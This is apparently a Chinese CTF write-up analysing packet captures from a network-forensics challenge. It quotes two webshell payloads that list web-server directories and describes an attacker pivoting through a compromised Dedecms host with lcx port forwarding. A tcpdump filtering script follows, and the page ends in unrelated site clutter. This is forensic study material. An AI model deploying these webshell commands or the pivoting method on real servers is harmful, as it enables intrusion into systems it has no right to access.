@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/include/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取目錄 /var/www/html/ 下的所有文件

攻擊者的思路以及攻擊流程也理清楚了
首先攻擊者(172.16.10.110)通過一臺可以訪問到的 Windows 主機(jī) 192.168.20.117 (Dedecms) 拿到 webshell 以后
通過 lcx 將內(nèi)網(wǎng)的主機(jī) 192.168.20.88 的 80 端口(phpcms)轉(zhuǎn)發(fā)到 172.16.10.110 的 8888 端口
進(jìn)一步利用漏洞拿到內(nèi)網(wǎng)主機(jī)的權(quán)限

到這里 HTTP 層面的題目感覺應(yīng)該已經(jīng)分析的差不多了 , 只要拿到題目應(yīng)該就可以直接填答案了
這道題目還提供了 ftp 的日志
應(yīng)該還和 ftp 協(xié)議有關(guān)

#!/bin/bash
#ftp.sh

target_folder='ftp'

mkdir ${target_folder}

for file in `ls *.pcap`;
do
   echo "Dumping ftp package in ${file}..."
   tcpdump -A -s 0 'host 192.168.20.117 or host 192.168.20.248' -r $file -w ${target_folder}/${file}
   echo "${file} Done!"
done

image.png

雖然有 FTP 的包 , 但是似乎并沒有日志中的IP
有可能是我數(shù)據(jù)包拷貝的不全 ?

最后編輯于：2018.03.12 11:25:29

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者

人面猴
序言：七十年代末，一起剝皮案震驚了整個濱河市腺劣，隨后出現(xiàn)的幾起案子绿贞，更是在濱河造成了極大的恐慌，老刑警劉巖橘原，帶你破解...
沈念sama閱讀 207,248評論 6贊 481
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件籍铁，死亡現(xiàn)場離奇詭異，居然都是意外死亡趾断，警方通過查閱死者的電腦和手機(jī)拒名，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 88,681評論 2贊 381
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門，熙熙樓的掌柜王于貴愁眉苦臉地迎上來芋酌，“玉大人靡狞，你說我怎么就攤上這事「舻眨” “怎么了？”我有些...
開封第一講書人閱讀 153,443評論 0贊 344
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵甘穿，是天一觀的道長腮恩。經(jīng)常有香客問我，道長温兼，這世上最難降的妖魔是什么秸滴？我笑而不...
開封第一講書人閱讀 55,475評論 1贊 279
?港島之戀（遺憾婚禮）
正文為了忘掉前任，我火速辦了婚禮募判，結(jié)果婚禮上荡含，老公的妹妹穿的比我還像新娘咒唆。我一直安慰自己，他們只是感情好释液，可當(dāng)我...
茶點(diǎn)故事閱讀 64,458評論 5贊 374
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布全释。她就那樣靜靜地躺著，像睡著了一般误债。火紅的嫁衣襯著肌膚如雪浸船。梳的紋絲不亂的頭發(fā)上，一...
開封第一講書人閱讀 49,185評論 1贊 284
城市分裂傳說
那天寝蹈，我揣著相機(jī)與錄音李命，去河邊找鬼。笑死箫老，一個胖子當(dāng)著我的面吹牛封字，可吹牛的內(nèi)容都是我干的。我是一名探鬼主播耍鬓，決...
沈念sama閱讀 38,451評論 3贊 401
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼阔籽，長吁一口氣：“原來是場噩夢啊……” “哼！你這毒婦竟也來了界斜？” 一聲冷哼從身側(cè)響起仿耽，我...
開封第一講書人閱讀 37,112評論 0贊 261
萬榮殺人案實(shí)錄
序言：老撾萬榮一對情侶失蹤，失蹤者是張志新（化名）和其女友劉穎各薇，沒想到半個月后项贺，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體，經(jīng)...
沈念sama閱讀 43,609評論 1贊 300
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡峭判，尸身上長有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 36,083評論 2贊 325
?白月光啟示錄
正文我和宋清朗相戀三年开缎，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片林螃。...
茶點(diǎn)故事閱讀 38,163評論 1贊 334
活死人
序言：一個原本活蹦亂跳的男人離奇死亡奕删，死狀恐怖，靈堂內(nèi)的尸體忽然破棺而出疗认，到底是詐尸還是另有隱情完残，我是刑警寧澤，帶...
沈念sama閱讀 33,803評論 4贊 323
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布横漏，位于F島的核電站谨设，受9級特大地震影響，放射性物質(zhì)發(fā)生泄漏缎浇。R本人自食惡果不足惜扎拣，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 39,357評論 3贊 307
男人毒藥：我在死后第九天來索命
文/蒙蒙一、第九天我趴在偏房一處隱蔽的房頂上張望。院中可真熱鬧二蓝，春花似錦誉券、人聲如沸。這莊子的主人今日做“春日...
開封第一講書人閱讀 30,357評論 0贊 19
一樁弒父案踊跟，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽。三九已至百拓，卻和暖如春琴锭，著一層夾襖步出監(jiān)牢的瞬間，已是汗流浹背衙传。一陣腳步聲響...
開封第一講書人閱讀 31,590評論 1贊 261
情欲美人皮
我被黑心中介騙來泰國打工决帖，沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留，地道東北人蓖捶。一個月前我還...
沈念sama閱讀 45,636評論 2贊 355
代替公主和親
正文我出身青樓地回，卻偏偏與公主長得像，于是被迫代替她去往敵國和親俊鱼。傳聞我的和親對象是個殘疾皇子刻像，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 42,925評論 2贊 344

[信息安全鐵人三項(xiàng)賽總決賽](數(shù)據(jù)賽)第四題

WriteUps

推薦閱讀更多精彩內(nèi)容